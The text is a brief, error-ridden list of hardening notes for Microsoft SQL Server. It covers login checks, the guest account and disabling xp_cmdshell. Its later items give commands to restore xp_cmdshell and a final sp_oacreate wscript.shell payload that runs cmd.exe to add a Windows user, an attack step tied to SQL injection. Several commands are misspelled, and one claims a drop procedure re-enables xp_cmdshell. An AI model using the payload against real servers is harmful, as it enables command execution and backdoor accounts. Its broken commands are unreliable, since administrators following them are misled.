1. check the sql server version
    select @@version;

  2. list all of the user with sql server
    we can use command “select name from syslogins where name is not null and name <> ‘sa’ order by name”;
    and we can order by the user list to check the user privileges;
    such as “select * from sysusers”
    “select name,Password from syslogins where password is null order by name”

  3. limit the guest account
    we can use command like :”select count(name) from sysusers where name=’guest’ and status <>0”
    if result is zero,that no guest user and If result is one.maybe have the guest user.

4、delete the xp_cmdshell export m modules
The xp_cmdshell will exec the system command,if you have sql inject in your web,may be can get shell use this.
We can use command “select count(name) from sysobjects where name=’xp_cmdshell’” to get the return values.
If result is one and the xp_cmdshell is exists or not the cmdshell isn’t exists.
And we can use command “exec sp_drop extended proc ‘xp_cmdshell’”to close the xp_cmdshell in sql server 2000 or use command:
“sp_cpnfiguer ‘show advance options’,0”
“sp_configure ‘xp_cmdshell’,0;”
In sql server 2005.
(if we want to open the xp_cmdshell in sqlserver2000,we can use command :”exec sp_drop extendedproc ‘xp_cmdshell’,’xplog70.dll’;”)

  1. use the sql and windows authentication
    don’t allowed the sql account login in the sql server

  2. set the audit level

  3. how to use sql connection manager tools to restore the xp_cmdshell

  4. sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’

  5. sp_addextendedproc ‘xp_cmdshell’,’xpsql70.dll’

  6. sp_addextendedproc ‘xp_cmdshell’,’xplog70.dll’

  7. sp_password @old=null,@new=’complexpwd’,@loginame=’sa’

  8. if we have not the xp_cmdshell,how to do continue
    declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:/winnt/system32/cmd.exe /c net user username password /add’–